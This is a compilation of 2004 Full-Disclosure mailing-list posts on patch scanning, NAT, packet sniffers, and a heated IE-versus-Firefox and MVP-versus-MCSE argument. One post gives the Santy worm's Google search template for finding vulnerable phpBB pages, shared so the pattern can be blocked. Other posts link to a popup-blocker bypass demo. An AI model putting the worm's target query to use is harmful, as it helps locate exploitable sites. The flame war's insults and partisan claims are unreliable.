[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB88 6185 Correction
Enterprise Update Scan Tool: http://support.microsoft.com/?id=894193 This tool seems to be a solution between MBSA releases. This tool may be what you need to detect those fixes. From the URL above: Why does this tool exist? Microsoft delivers this tool for certain bulletins in an MSRC release cycle that cannot be detected by the MBSA or the ODT. Each tool is specific to an MSRC release cycle. and Why do the MBSA and the ODT not detect this update? The MBSA and the ODT may not offer full detection for certain bulletins in an MSRC release cycle. Full detection may not be available because of a limitation of the detection engine or because the product that is affected is not supported by the MBSA or the ODT. We are working to resolve this issue in future versions of the MBSA through the Windows Update Server infrastructure. In the meantime, the Enterprise Update Scan Tool is designed to complement the MBSA and the ODT for security update detection. Whenever MBSA or ODT cannot offer detection, we plan to release an Enterprise Update Scan Tool. Joe Granto, Senior Engineer Intel Engineering, MCI (back in black) Marimba Jedi Office: (954)377-5632 VNET: 377-5632 Pager: (888)500-6340 or [EMAIL PROTECTED] FAX: (954)377-5793 LINUX is only free if your time is worthless. There is no estimated time of resolution. Fear my three minute POP time-out. There is no WorldCom, only Zuul. WorldCom... it was all a bad dream. What's $11 billion between friends? Complete adj.: having all necessary parts, elements, or steps Sprint, BP, WorldCom, Qwest, Verizon.. someone make the pain stop. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] NAT router inbound network traffic subversion
In message [EMAIL PROTECTED], Kristian Hermansen [EMAIL PROTECTED] writes I have Googled around and asked a highly-respected Professor at my University whether it is possible to direct packets behind a NAT router without the internal 192.168.x.x clients first requesting a connection to the specific host outside. The answer I received is not possible. I also asked if this can be thought of as a security feature, to which the reply was again yes. Yes. But see later. Now, I wouldn't place all my bets on his answer and I am calling on someone out there to clear up my question. If NAT really does only allow inbound connections with a preliminary request as he suggests, it seems that the only way to get an unauthorized packet behind the router is by some flaw in the firmware of the device. If you are not offering any services to the Internet, yes. If you are, then you have ports open on the router, redirecting to real machines, which may be running software which can be exploited. This is how worms spread. the home user is unlikely to be hit by a worm, unless they are running a Windows NT-derived operating system, such as XP, without a firewall and/or NAT device. Commercial installations such as web servers are the main targets for worms. How about if the client has requested a connection to Google.com from behind his Linksys home NAT router: would it be possible for an outside attacker to spoof packets from Google's IP to get packets into the network? Or do we need to know the sequence numbers as well? Or is there an even more devious way to get packets on the inside without a client's initiative? Google for man in the middle attack. Has there been any research into this? Are there statistics on worm propagation and exploited network hosts in relation to those individuals that did not own routers (and instead connected directly to their modem)? If *all* home users on the Internet had NAT routers during the summer of 2003, would we have significantly slowed the spread of Blaster? I believe these all to be very important questions and the security aspects of the ability to route packets behind NAT really interests me...maybe some of you can elaborate :-) Worms are not usually an issue for home users, except when someone sells an operating system with ports open to the Internet by default. XP pre-service pack 2 is such an operating system. Its users were duly hammered by worms, and would not have been if they used the built-in firewall, which was not enabled by default. I'm not sure how much a NAT device would have helped on its own. Modern versions of Windows are extremely talkative, and it may well have invited the bad guys in of its own accord. But widespread use of the firewall would have stopped it. More troublesome for home users are viruses spread by email, which initiate connections through the firewall, router or other device from the inside. The security device cannot generally tell whether the user or a virus has made the request, though third-part 'personal' firewalls, running on the user's workstation, are becoming quite good at this. I don't think Internet Explorer currently runs any code in an incoming email automatically, as it once did, but it's not hard to persuade many users to click on a button and run the virus themselves. Most viruses are now also worms, they will attempt to spread both by email and by direct contact with unprotected machines. -- Joe ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Possible apache2/php 4.3.9 worm
The search query used by the Santy worm uses the following template (parentheses contain substitution choices and are not part of the literal template) : http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22 (random choice between t, p, and topic)%3D( random number between 0 and 3)%22btnG=Search Below are some examples of what an actual Santy search request would look like: http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22btnG=Search http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22t%3D2580%22btnG=Search http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22p%3D6653%22btnG=Search If Google were to block this particular pattern of search request it would stop the spread of the worm for now. -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !
The pop-up does not work with all options relating to ActiveX set to disabled, but most user would not bother to disable it. Another reason to use another browser. J [EMAIL PROTECTED] wrote: Friday, December 10, 2004 Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys a fairly robust popup blocker. This little 'thing' has been a major irritation to date. Nothing gets past it until now. Chatter exists that some sites have defeated it on the causal default setting. We only deal in the high settings here ! Our Chairman and CEO, Mr. Liu Die Yu takes the sledgehammer and cracks open this bothersome little nut like so: http://www.malware.com/flopup.html Notes: 1. Nothing like a bit of irritation to get constructive 2. Additional popup blocker from MSN is also killed, may may Die ! too 3. Get editive before it's too late: http://www.editive.com 4. None End Call ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] amazon security contact
search for B05D70 on amazon.com. Opps, Targets forgot to add description to the item. http://www.amazon.com/exec/obidos/ASIN/B05D70/ or you can get drug and hooker. http://www.target.com/gp/detail.html/?%5Fencoding=UTF8asin=0823916839 http://www.target.com/gp/detail.html/?%5Fencoding=UTF8asin=B0I1F6 http://www.target.com/gp/detail.html/?%5Fencoding=UTF8asin=B0I1F6 http://www.target.com/gp/detail.html/?%5Fencoding=UTF8asin=B0I1F6 Knarr, Joshua wrote: Heh, would this have anything to do with the recent TARGET defacements? http://www.target.com/gp/detail.html/601-1627735-4860151?_encoding=UTF8; asin=B05D70 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Wednesday, December 01, 2004 7:21 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] amazon security contact Hello, does anybody know an email alias at amazon.com to report a vulnerability? I tried to report multiple XSS issues to their customer support during the last few days, but got no feedback at all. mikx ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Network Sniffing
Title: Network Sniffing Gentleman, I have been having all kinds of quirky network problems at one of my facilities. I always used SnifferPro to identify top talkers and babbling machines. Now that I work for The Hive I am no longer allowed to purchase licenses for such wonderful products. So the question is more of a poll of what the best of the best use for there networks. M$ and *NIX cheap and free. Joe Crehan Customer Engineer GE Infrastructure Deskside Support Team GE Information Technology solutions, Inc. T 508-698-7567 F 508-698-6940 E [EMAIL PROTECTED]
Re: [Full-Disclosure] Network Sniffing
netcat, ethereal a good list of tools. http://www.insecure.org/tools.html Unknown wrote: On Tue, 2004-11-30 at 14:43 -0500, Danny wrote: On Tue, 30 Nov 2004 13:39:02 -0500, Crehan, Joe (EM, ITS, Contractor) [EMAIL PROTECTED] wrote: Gentleman, I have been having all kinds of quirky network problems at one of my facilities. I always used SnifferPro to identify top talkers and babbling machines. Now that I work for The Hive I am no longer allowed to purchase licenses for such wonderful products. So the question is more of a poll of what the best of the best use for there networks. M$ and *NIX cheap and free. ntop. Ethereal. Tcpdump. Ngrep. Maybe snort? :P - K ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Is www.sco.com hacked?
At 07:58 AM 11/29/2004, Rossen Naydenov wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi guys, I just noticed the banner on www.sco.com If you don't saw it( because it is removed) this is what they say: We own all your code pay us all your money Or is it some commercial trick? Perhaps what the lady is writing on the board has some bearing here: hacked by realloc( -- Joe ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
FYI. This is just one of the many items currently in the oven that I was alluding to previously. Of course some people will take this and complain that people shouldn't be running as admins in the first place (to which I agree) but prior to complaining about it, hold tight and watch for what else comes out. MS really shocked me and some others with some of the stuff they are putting together. It is just taking some time to get spun up in this newer direction but I think once they are fully aimed that way people will be a bit dazzled by how much starts coming out. I don't expect the coming changes will make every one happy both because there are some area that just can't be easily fixed and because some people will never be happy no matter what MS does. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of devis Sent: Wednesday, November 24, 2004 6:45 PM Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox http://msdn.microsoft.com/security/securecode/columns/default.aspx?p ull=/library/en-us/dncode/html/secure11152004.asp Nice ...fresh from the oven too. This, if it works, should be a 'extremely critical' update from Ms. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
LOL, ok you have me on that one. It is something, but very little. :oD Joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: Frank Knobbe [mailto:[EMAIL PROTECTED] Sent: Saturday, November 20, 2004 11:54 AM To: joe Cc: [EMAIL PROTECTED] Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox On Sat, 2004-11-20 at 08:20, joe wrote: I agree with your initial comment, they can both be changed. I also agree they both do little. I don't agree that the hardcoding in the source does anything for you. Well, it *allows* you to change the ID of the superuser account to something else. But of course that is obfuscation, and is quickly discovered (just check what ID owns /bin/* and so on). Nevertheless, you have the *ability* to change the ID. You can't do that with Windows. (Yeah, cheap shot I know... ;) Cheers, Frank ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
OSX is an interesting case but at the moment it is still an infant. I look forward to seeing what happens with it as you are correct, it is very consumer oriented. To put it another way, it is a chance for *nix to show off its normal user wings if it has any. People who would get off Windows because they have a viable *nix alternative have this option now though there is still a discrepency in available commercial packages which I guess could cause an issue. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Shoshannah Forbes Sent: Sunday, November 21, 2004 3:52 AM To: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Well, Mac OSX is a fully consumer *nix. Can you say that Mac users tend to be already knowledgeable with its workings or people who WANT to learn the details using it? I am not so sure about it. BTW, on Mac OSX, by default the root account is *disabled*. All administrative tasks are done with 'su/sudo'. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: Re: [Full-Disclosure] IE is just as safe as FireFox: Moved to Education
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of RandallM The question above is answered IMHO as yes. Any one who admins or is a PC support person would have to agree. Come'on, if you change their monitor they freak out that there folders are now gone! Absolutely. One bank division I worked at had a lady who would go ballistic if a single ICON was out of place after work was done on her PC and would refuse to work until it was corrected. This person was responsible for doing the money moves for trades and securitizations to maintain liquidity levels for credit rating which consisted of at least a billion dollars a day. We would actually have to take a polaroid photo or screen prints prior to and after working on her PC for CYA. We also did weekly images of her PC, it was the only one of the several thousand at that facility we had to do that for. True story. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows user privileges
On Fri, Nov 19, 2004 at 04:19:49PM -0600, Paul Schmehl wrote: Windows has several groups. By default users are in the USERS group, *not* the ADMINISTRATORS group. On every XP install that I've seen from every major OEM (Dell, Compaq, Gateway, etc) fast user switching is on by default and every user is an administrator. Not on most; on every single one. I would say that is more the fault of the configuration than anything. Probably cheaper for the OEMs to do it that way from a educational perspective, they don't have to teach the user anything, just say go. Joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox )
taken some classes on the NT stuff. I quickly realized that the classes and the content of the exams wasn't too reflective of what was done in the real world in Fortune 50 companies so decided against it. I have not suffered in the least due to that decision. As a short recap, let's look at some differences between MVPs and MCSE's 1. Which can occur in shortest time, becoming an MVP or becoming an MCSE? MCSE - 7-14 days. See bootcamps that are available, I have had friends do it even without bootcamp. 2. Which participate in regularly scheduled NDA chats with Microsoft Dev, product managers, and Execs? MVPs 3. Which ones have to sign NDAs yearly due to sensitive information they are presented and accesses they have? MVPs 4. Which ones are brought back to Redmond at least once a year for NDA level meetings with Dev, PM's, and Execs? MVPs 5. Are there more MCSEs or MVPs? MCSEs 6. Who, as a group, has access to Windows Source Code, MCSEs or Windows MVPs? Windows MVPs. This is to help with the tough outlook questions you mentioned. 7. How much does it cost to become an MVP? Nothing. How much does it cost to become an MCSE? Varies, but at the minimum several hundred dollars. Some spend thousands. 8. How often does an MVP have to be renewed? They don't, every year they have to be reawarded from scratch. How often does an MCSE have to renew? Once an MCSE, always an MCSE, however they can upgrad when new OSes are released every so often. And there are usually upgrade helper methods to maintain the MCSE, testing from scratch is not required. 10. What kind of peer review is involved with MCSE program? None. How about MVPs? MVPs are responsible for nominating other MVPs and are often asked what they feel about this or that nominee and whether they should be awarded. I could go on with this list but I don't need to. There is nothing integral to the MCSE program that says an MCSE actually has to understand what they are doing but an MVP who consistenly answers things incorrectly will not be re-awarded if they were mistakenly awarded in the first place. An MCSE simply has to have the ability to pass written tests in a scheduled time frame, all that implies is the ability to memorize information for a short time. Maurizio, take the time to look closer at that list of MVPs next time you are out at the MS Site. I would be highly shocked if you haven't learned something from one or more of them as it means you aren't reading many (dare say most) of the good Windows books (as well as non Windows books such as popular books on DNS and other internet tech) that are available, including several MCSE study guides. Also tools from several large third party vendors such as Quest and SysInternals come from the minds of MVPs who are CTOs and developers. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Maurizio Trinco Sent: Saturday, November 20, 2004 3:17 PM To: [EMAIL PROTECTED] Subject: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox ) joe [EMAIL PROTECTED] wrote: [1] Don't get me started on MCSEs. As a whole I think they hurt Windows far more than any other thing. A bunch of people who feel they are experts in Windows because they took a couple of tests that 10 year olds could memorize and pass and yet still not be able to run anything. The best I can say about MCSEs is that I will *try* not to look down upon them for being MCSEs and let them prove themselves to be worthless before I assume it in person. Now from joe's own site, comes this fully untrue statement: 'So what is a Microsoft MVP? The flip response is a Microsoft MVP is a person who answers the questions the MCSE/MCD/MCT folks ask.' My dear Joe, Let's see what Microsoft has to say about MVPs: http://mvp.support.microsoft.com/default.aspx?scid=fh;EN-US;mvpfaqsstyle=fl at Are Microsoft MVPs experts in all Microsoft technologies and products? No. Although many MVPs have in-depth knowledge of more than one product or technology, none of them are experts in all Microsoft technologies or products. So, my dear joe, you are nothing but an ego-inflated bullshitter. Your verbal diarrhea is only matched by your unbelievably low level of competence when it comes to Microsoft products. Being an MCSE is much more than answering some how do I send a message with Outlook in one or two newsgroups. I worked really hard for my MCSE titles and honestly, the idea that I (or any of my colleagues) could seek enlightenment from you is simply ridiculous. If you think that passing exams like 216, 296 or the design exams is something an... er, MVP could do... then you'd better think again. While I'm an MCSE, I'm by no means an ass-kisser for Microsoft, as your MVPiness seems to be. Their products, contrary to popular belief, could be extremely complex (try real life business environment, compared to that unlicensed version
RE: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox )
Georgi, The may sound harsh, but the day I worry about proving my anything to you is the day after I decide to get the MCSE certification. Further, if I ever get to the point about worrying what you think, I will have to hang my 0 and 1 bits on the rack. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Georgi Guninski Sent: Sunday, November 21, 2004 3:01 PM To: Micheal Espinola Jr Cc: [EMAIL PROTECTED] Subject: Re: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox ) On Sat, Nov 20, 2004 at 06:06:10PM -0500, Micheal Espinola Jr wrote: Your accusations again joe's expertise and knowledge in this area are completely unsubstantiated. i have not seen any proofs of joe's expertise or knowledge - can you give some proofs? for me joe is just a chatterbox in bed with m$. -- where do you want bill gates to go today? Microsoft Valued Prostitute ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Well if hacking Windows cold across a tcp/ip service such as web this may be helpful, but it doesn't require much more than that to figure out what the admin account is for a given machine. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremy Davis Sent: Friday, November 19, 2004 9:40 PM To: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Are you able to change root's name in nix? Why not if the answer is no? (Things would break right? UID 0?) Knowing the account name is two-thirds of the battle. In windows it's fairly easy to change the admin name. Not a professional here just curious... J ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
way won't ever consider moving to the new platform Q or whatever they choose to call it. This is such a non-realistic viewpoint it is actually quite laughable. And again, if you go back to a previous conversation from this list, it isn't all of Windows, especially Windows kernel/core level stuff that has an issue. It is some key pieces of the shell. Possibly in your understanding of Windows though, the Shell is all of what you believe Windows is comprised of. joe [1] Don't get me started on MCSEs. As a whole I think they hurt Windows far more than any other thing. A bunch of people who feel they are experts in Windows because they took a couple of tests that 10 year olds could memorize and pass and yet still not be able to run anything. The best I can say about MCSEs is that I will *try* not to look down upon them for being MCSEs and let them prove themselves to be worthless before I assume it in person. -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of devis Sent: Friday, November 19, 2004 11:10 AM Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox This message is primarily destined to all MS trolls, no matter their levels, and i can see so many in this list that i am happy to target a large audience. Please run some unix or at least read about the unix permission system, and lets pray god this sheds some light in your mono cultured brains. Here are the relevant points: 1) Despite recent ameliorations of MS ( multi user finally, permissions ... ) and some effort at making the system more secure, something very important is still left out: The first default user of the MS computer is made an administrator. This comes down to giving uid0 to ur first unix user. Unix does NOT do that. It requieres you to use su and become root ( administrator ) after proper credentials submission ( password ). The first user is NOT and administrator, and any recent Unix documentation will insist on the danger of running as root(admin). Unix keeps the admin account well separated from the user account, which MS DOESN'T, despite all wrong arguments i read on this list. VERY BAD practice generally. So its user friendly, as the user has admin rights and can therefore install and remove software and change major configuration. Majority of users don't and will never know there is an 'administrator' user that hides from their eyes. This little detail that apparently Ms people can't 'understand' is a huge step. Please install a proper unix, create 2 accounts and try to read the home directory of the second user from the first. 2) After all, they don;t need to know . You're on a need to know basis job Do MS really think the users are stupid ? Do understanding different IDs/ roles / accounts on a computer that much of a tough message to pass to the end user ? Isn't security important and supposedly the goal of recent MS developpements ? If they really did target security, their efforts will have been into making the user understand that he should be admin to install programs, and a non priviledged user to surf the web. IS that that hard to understand ? And that much hidden into high IT security professionnal unreachable knowledge ? I don;t think so. Doesn't a company such as MS has enough ressources to make that a priority and educate the users ? Off course it has. Just not very 'commercially' friendly as if user then understand roles, it might requires less Anti virus, personnal firewall and other bullshit FUD's scareware ( Yes its scareware, and it is the best selling software category OF ALL times of software history ). This is why, Firefox being independant from this OS that carries 60 of its code base as being legacy code for older system hardware and backward compatibility, is likely more secure than the in house integrated application. Now if u are running Firefox as an administrator .don't be surprised if something happens. Don;t blame the software, but your poor security practices. Lets not hide from ourselves whats needed from MS to reach modern world security: a complete rewrite, and a ditch of old Dos base and the 20 years old legacy code. Hopes that clears things. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
I agree with your initial comment, they can both be changed. I also agree they both do little. I don't agree that the hardcoding in the source does anything for you. -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Friday, November 19, 2004 10:42 PM To: Jeremy Davis Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox On Fri, 2004-11-19 at 20:40, Jeremy Davis wrote: Are you able to change root's name in nix? Why not if the answer is no? (Things would break right? UID 0?) Knowing the account name is two-thirds of the battle. In windows it's fairly easy to change the admin name. Not a professional here just curious... You can change the name of the root account in Unix, just like the Administrator account in Windows. But you can not change the UID of the root account (0) just like you can not change the SID of the Administrator account (500). I argue that changing the account name in Unix does as little or much as changing the account name in Windows. If you have access to the system you can easily find the account name of the UID 0 account, just as easily as you can figure out the name of the SID x-500 account. The difference is that you can change and hard code that change in the source of Unix (at least with those that you have the source for, Linux, *BSD, whatever). Can you do that with Windows? Regards, Frank ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
I think if the main design of any system was run as mortal and do runas for things that need more, you would have a system that by default, NEVER allowed interactive logon to an account that does more. Further it wouldn't let you change that code to allow it. Heck I would even take it further and say that the raised levels of access would be process only based, once that process completed, it would revert. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Friday, November 19, 2004 5:14 PM To: Crotty, Edward Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said: I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. Yes, but is *the main design* of the system run as a mortal, and use the 'runas' for those things that need more? Or is the *main design* We'll just elect the first user as Administrator, and include 'runas' in case somebody wants to Do It The Right Way? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Autoconfig script may enumerate hosts which don't require a proxy. Usually there are a very few intranet servers in corporate network. You should have prefixed there are very few... with one of two things 1. Relative to the internet... 2. In my experience... I have been on several large corporate networks where there are hundreds or thousands of intranet web servers hosting tens of thousands of sites. Many large enterprise class companies are moving whole hog to web based apps internally (even email) and all available content is on the internal web. This is actually the area where IE is so strongly embedded due to its application interfaces and what MS has been building towards for so long with it. If you look at this space and compare how firefox renders/operates next to IE you will see why many companies chose IE as their official browser even in the face of having more exposure due to security. A lot of that depends on how the web site is designed/built but there is a lot of functionality there that can only be reached (and thereby exploited) on IE. There are companies whose primary LOB applications internally are on IIS servers and can only be accessed with IE. In those cases it isn't a simple pick up and replace the browser scenario. More, I consider IE feature to ignore proxy for LAN hosts may be dangerous. Imagine a worm which spreads by this algorithm: it launches HTTP service on victim host, lures user at another PC to open URL pointing to victim, then launches on target PC. The fact as previosly affected host is situated in Local intranet zone, significantly facilitates worm spreading. I wouldn't really call that a worm. Worms work without interaction. They are self-propagating/replicating. Malware that spreads that requires user interaction would generally just be called a virus. Overall trying to push intranet users accessing intranet content through a proxy to sanitize web pages would be unsatisfactory because it couldn't fully be enforced since the content is available right there on the intranet. Someone could do some form of offline gather or use many different tools to get the data so forcing firefox or IE to go to a specific proxy does nothing for you. You would have to put the intranet servers behind some sort of firewall that you would have to access them though. Plus you obviously have to scale the proxy to a completely different level if processing all intranet requests as well as internet requests. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Raoul Nakhmanson-Kulish Sent: Friday, November 19, 2004 5:01 AM To: Esmond; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Hello, Esmond! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Georgi, you obviously aren't in touch with the real world if you don't realize which OS and browser comprise a vast majority of the market. That penetration often dictates for many IT professionals which OS they will be working on if they actually choose to work in the field. When you specify our in this way, you are specifying a very small minority. As someone else mentioned, I believe on this list, they had the option of working on MS products and making money (that is what companies are in business for BTW) or working on non-MS products and fighting with other suppliers over a small market and probably not making any money. As much as I hate car analogies Instead of jumping to a car that runs on hydrogen because it is safer and better for the environment and bitching at all of the gas stations that don't sell hydrogen I would rather just stick with a gasoline vehicle until the hydrogen infrastructure is able to support a large number of hydrogen vehicles. If I need to drive from Tennesee to Florida I need to drive, I don't need to spend the time whining and complaining and trying to find places that can make it so I can actually do what I need to do. If I have a hydrogen tank by home though, that is perfect for driving around there as long as it handles everything else I need in that space. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: Georgi Guninski [mailto:[EMAIL PROTECTED] Sent: Thursday, November 18, 2004 3:55 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox On Wed, Nov 17, 2004 at 09:22:33PM -0500, joe wrote: Pro-Choice Let me choose if I even want a browser loaded thanks! what the fuck is this? we can chose such things on our os, who must let you choose? -- where do you want bill gates to go today? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
I 100% agree with you. I never said MS was the best or even that they should always be used. In fact in many occasions I have pushed for alternative answers for companies who were customers. Being the best or even better doesn't mean you will become the most popular either. Look at Apple. Look at BetaMax. Look at lots of things. To fully be honest though, MS isn't McDonalds. MS in the food world would be McDonald's, Burger King, Wendies, Hardees, Taco Bell, Red Robin, Olive Garden, Dominoes, Pizza Hut, Little Caesers, Jack in the Box, and every other food chain you know of and also every major diner and eatery you know of. The things that weren't Microsoft would be the little corner deli's, placed that are called names like Michael's kitchen or Mohsin's Falafel stand. It is a simple fact of life that MS has enough overall market share to make the penetration of all other OS'es look like rounding errors. MS appeals to the masses, the others appeal to niche areas. Look at the numbers. This means that we have to do serious work at getting the stuff corrected. Whining and complaining that they aren't the best or that they suck or that billg is hellspawn does nothing to help anyone. Basically, just because MS is on top, doesn't mean we shouldn't work to push them to get better or give up and say, OS * does it much better, forget them. But at the same time, we have to be realistic about the goals and what needs to be done. Someone saying that they won't use IE and any web site that requires it is stupid because they aren't following web standards is rather shortsighted and having troubles grasping reality. Someone saying that MS needs to rip all of that out immediately is also having reality issues. I do think it is right and feasible for MS to give people a choice as to whether they want IE bits on a machine or not at all (this includes all of the bits). If I run an MS box and html content doesn't work in my MS mail reader, I am not going to be overly upset. If I was, then say I install that component. The realistic gripe is that we don't have the option to not load IE at the moment. Trying to change that is a realistic goal, definitely on servers for instance, users aren't visiting web sites from servers or at least probably shouldn't be. Microsoft can become secure and they are working towards it. It is just going to take a good amount of work to do so. :o) joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: john morris [mailto:[EMAIL PROTECTED] Sent: Friday, November 19, 2004 4:32 PM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Dear Joe, So many out there use MS OS doesnt make it the best just as so many people go to McDonalds doesnt mean they make the best food -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
I recently spoke with some MS Security Execs and I know they wouldn't argue with this point. They know they have to improve and are working hard to do so. It would have been nice had they started this work 10 years or more ago but thankfully they have started now. Someone asked me to describe what I saw and heard about when I went out to Redmond to check things out recently and all I could really say is they are ramping up fast in the backend but it takes a while to spin things around when you have so many people using your product in so many ways. They truly have a ton of cool stuff they are working on and I personally had no understanding of how much was going on behind the doors and was quite surprised to see what I saw and how honest they are being about things internally. They aren't just standing there telling each other they are the greatest and all of this will just go away on its own. I realize from the outside it can look that way, I certainly had my own thoughts that way at times. It was good to see and hear that the IE team is pretty raw about the edges over the issues that have occurred over the last few years (as well they should be) and internally MS sees this and knows it and is working to correct. One thing that was asked for is that they move faster and release tools in an initially unsupported way to get the feedback sooner so the end results can be better. Right now they have a tendency to hold things close to chest for a long time testing and worrying and wanting to try and catch all possible issues so that they don't release something and get beaten up by a bunch of boneheads looking to hear their own name on lists and news broadcasts. This means a lot of stuff that they possibly have answers to don't see the light of day until a considerable time after the initial punch in the gut. I personally would be fully happy if tools were put out that were described as unsupported at the moment but we are working on finalizing it and releasing it in a supported manner. Then if a problem is found, feedback is given to MS properly and not a FD post of oh my god MS sucks because they are so stupid and I figured it out because I am so L33T, etc etc ad nauseum which this list in particular is SOOO good at. Some of the people around here shouldn't be able to breath they thump their own chest so hard and so much. Many of the others have no clue what they are talking about and simply reiterate anything they thought they heard that might be bad that they heard from someone much brighter than them. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL 